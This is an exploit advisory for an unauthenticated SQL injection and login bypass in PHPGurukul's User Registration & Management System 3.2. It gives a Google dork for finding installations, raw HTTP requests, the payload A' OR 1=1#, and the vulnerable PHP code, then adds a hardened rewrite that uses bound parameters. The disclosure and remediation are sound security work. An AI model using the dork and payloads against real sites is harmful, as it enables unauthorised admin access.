## https://sploitus.com/exploit?id=PACKETSTORM:179147
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
.:. Exploit Title > User Registration & Management System - SQLi  
.:. Google Dorks .:.  
inurl:loginsystem/index.php  
.:. Date: June 18, 2024  
.:. Exploit Author: bRpsd  
.:. Contact: cy[at]live.no  
.:. Vendor -> https://phpgurukul.com/  
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003  
.:. Product Version -> Version 3.2  
.:. DBMS -> MySQL  
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
#############  
|DESCRIPTION|  
#############  
"User Management System is a web based technology which manages user database and provides rights to update their details. In this web application the user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."  
===========================================================================================  
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass  
Types: error-based  
File: localhost/admin/index.php  
Vul Parameter: USERNAME [POST]  
POST PoC #1: http://tom:8080/loginsystem/admin/index.php  
Host: tom  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
Origin: http://tom  
Connection: keep-alive  
Referer: http://tom/loginsystem/admin/index.php  
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a  
Upgrade-Insecure-Requests: 1  

username='&password=test&login=  
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9  
===========================================================================================  
Test #2 => Payload to skip authentication  
http://localhost:9000/loginsystem/admin/index.php  
username=A' OR 1=1#&password=1&login=  
Response:  
302 redirect to dashboard.php  
===========================================================================================  
Vuln File: /loginsystem/admin/index.php  
Vul Code:  
<?php session_start();  
include_once('../includes/config.php');  
// Code for login  
if(isset($_POST['login']))  
{  
// Raw POST value, taken with no validation or escaping  
$adminusername=$_POST['username'];  
// Unsalted MD5 of the submitted password  
$pass=md5($_POST['password']);  
// The username is concatenated straight into the SQL string: this is the injection point.  
// A lone quote breaks the query, so mysqli_query() returns false and the  
// mysqli_fetch_array() warning above is emitted (error-based confirmation).  
// "A' OR 1=1#" closes the string, makes the WHERE clause always true and the  
// trailing # comments out the password check, so the first admin row is returned.  
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");  
$num=mysqli_fetch_array($ret);  
if($num>0)
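For comparison, the following is a hardened rewrite of the same admin login handler. It is an added example and not the vendor's code: the username is passed as a bound parameter so it can never alter the query text, and passwords are stored and checked with `password_hash()`/`password_verify()` instead of unsalted MD5. The table and column names (`admin.username`, `admin.password`) follow the advisory's query; the in-memory SQLite database, the sample admin record and its password are constructed only so the example runs stand-alone without the project's `config.php` connection.

```php
<?php
// Added example, not from the original advisory or the PHPGurukul project:
// a hardened version of the login handler in loginsystem/admin/index.php.
declare(strict_types=1);

// Constructed test database. In the real application this would be the existing
// $con connection from ../includes/config.php (MySQL); SQLite is used here so the
// example runs offline. The schema mirrors the vulnerable query's table/columns.
function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)');
    // Sample admin (constructed): password stored as a salted bcrypt hash, not md5().
    $stmt = $db->prepare('INSERT INTO admin (username, password) VALUES (:u, :p)');
    $stmt->execute([
        ':u' => 'admin',
        ':p' => password_hash('Correct-Horse-Battery', PASSWORD_DEFAULT),
    ]);
    return $db;
}

/**
 * Returns the admin's id on success, null on failure.
 *
 * The username is a bound parameter, so input such as "A' OR 1=1#" is compared
 * literally against the username column and matches nothing. The password is
 * verified in PHP against the stored hash, never compared inside the SQL.
 */
function authenticateAdmin(PDO $db, string $username, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, password FROM admin WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null; // unknown user
    }
    if (!password_verify($password, $row['password'])) {
        return null; // wrong password
    }
    return (int) $row['id'];
}

// HTTP request handling, same POST field names as the original form.
if (PHP_SAPI !== 'cli' && isset($_POST['login'])) {
    session_start();
    $db = makeDb(); // real app: the existing database connection
    $id = authenticateAdmin(
        $db,
        (string) ($_POST['username'] ?? ''),
        (string) ($_POST['password'] ?? '')
    );
    if ($id !== null) {
        session_regenerate_id(true);      // new session id after privilege change
        $_SESSION['admin_id'] = $id;
        header('Location: dashboard.php');
        exit;
    }
    http_response_code(401);
    echo 'Invalid username or password';  // same message for both failure cases
}

// CLI demo: the advisory's bypass payload versus valid credentials.
if (PHP_SAPI === 'cli') {
    $db = makeDb();
    var_dump(authenticateAdmin($db, "A' OR 1=1#", '1'));
    var_dump(authenticateAdmin($db, 'admin', 'Correct-Horse-Battery'));
}
```

Run with `php hardened_login.php` (assumed file name) from the command line: the first call, using the advisory's `A' OR 1=1#` payload, yields `NULL` because the whole string is matched literally as a username, while the second yields the admin's id. Because the query can no longer fail on a stray quote, the `mysqli_fetch_array()` warning that confirmed the injection also disappears; any remaining database error should be logged server-side and answered with a generic message, not echoed to the client.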